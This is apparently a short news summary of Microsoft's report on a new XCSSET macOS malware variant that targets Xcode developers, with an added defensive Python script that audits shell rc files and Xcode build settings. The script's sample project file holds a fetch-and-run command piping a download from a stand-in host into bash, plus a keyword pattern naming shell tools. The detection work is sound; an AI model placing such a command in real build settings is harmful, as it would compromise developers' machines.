Microsoft has detected a new variant of XCSSET, a powerful and highly destructive macOS malware family. XCSSET was first reported in 2020, and this variant marks the first publicly known update to the malware since 2022. Microsoft said it has observed limited attacks so far, but warned that the malware poses significant security risks.
The new XCSSET variant features improved persistence methods, allowing compromised devices to remain infected even after system reboots. It achieves this by creating a hidden file in the user’s shell configuration and replacing legitimate Launchpad app entries with fake ones.
Enhanced infection methods have also been introduced, including an option to choose when the malware triggers its payload, as well as a method that injects the payload into build settings on Xcode projects. The malware now uses more advanced obfuscation techniques, making it harder for security researchers to detect and analyze.
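A defender-side audit suggested by the two techniques above (a hidden file pulled in from the shell configuration, and payload text injected into Xcode project build settings), as an added example that is not part of the Microsoft or Ars Technica reporting: it flags shell rc lines that source or run a hidden dotfile, and build-setting values in a project.pbxproj that embed shell commands. The regexes, the rc file list and the sample contents are constructed heuristics for illustration, not XCSSET indicators.

```python
import re

# Shell rc files read at login or on every new interactive shell (typical set, assumption).
RC_FILES = ("~/.zshrc", "~/.zprofile", "~/.bashrc", "~/.bash_profile", "~/.profile")

# A line that sources or runs another file; group 1 is the referenced path.
SOURCE_RE = re.compile(r'^\s*(?:source|\.|sh|bash|zsh)\s+(\S+)')
# Tokens that have no business inside an Xcode build-setting value (heuristic list).
SUSPICIOUS_SETTING_RE = re.compile(r'\b(?:curl|base64|eval|osascript|bash|zsh|sh -c)\b')


def find_hidden_sourced_files(rc_text: str) -> list[str]:
    """Return paths sourced/run from rc_text whose last component is a hidden (dot) file."""
    hits = []
    for line in rc_text.splitlines():
        m = SOURCE_RE.match(line.split('#', 1)[0])  # ignore trailing comments
        if not m:
            continue
        path = m.group(1).strip('"\'')
        if path.rsplit('/', 1)[-1].startswith('.'):
            hits.append(path)
    return hits


def find_suspicious_build_settings(pbxproj_text: str) -> list[str]:
    """Return lines inside buildSettings = { ... }; blocks that embed shell-like commands."""
    hits, in_settings = [], False
    for line in pbxproj_text.splitlines():
        stripped = line.strip()
        if stripped.startswith('buildSettings = {'):
            in_settings = True
        elif in_settings and stripped == '};':
            in_settings = False
        elif in_settings and SUSPICIOUS_SETTING_RE.search(stripped):
            hits.append(stripped)
    return hits


# Constructed sample inputs; the file names and values are made up for this example.
SAMPLE_ZSHRC = """\
export PATH=$HOME/bin:$PATH
source ~/.oh-my-zsh/oh-my-zsh.sh
. "$HOME/.zshrc_aliases"
alias ll='ls -la'
"""
SAMPLE_PBXPROJ = """\
      buildSettings = {
        PRODUCT_NAME = "$(TARGET_NAME)";
        SWIFT_VERSION = 5.0;
        MY_CUSTOM_STEP = "sh -c 'curl -s http://example.invalid/x | bash'";
      };
"""

if __name__ == "__main__":
    print(find_hidden_sourced_files(SAMPLE_ZSHRC))        # ['$HOME/.zshrc_aliases']
    print(find_suspicious_build_settings(SAMPLE_PBXPROJ))  # the MY_CUSTOM_STEP line
```

On a real machine, feed each expanded entry of RC_FILES and every project.pbxproj under a developer's source tree to these functions and review the hits by hand; a hidden dotfile sourced from an rc file is not malicious by itself.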
The detection of this new variant highlights the ongoing threat posed by macOS malware, particularly for developers who use Xcode tools. Microsoft’s warning underscores the need for users and developers to remain vigilant and implement robust security measures to protect themselves against such threats.
Source: https://arstechnica.com/security/2025/02/microsoft-warns-that-the-powerful-xcsset-macos-malware-is-back-with-new-tricks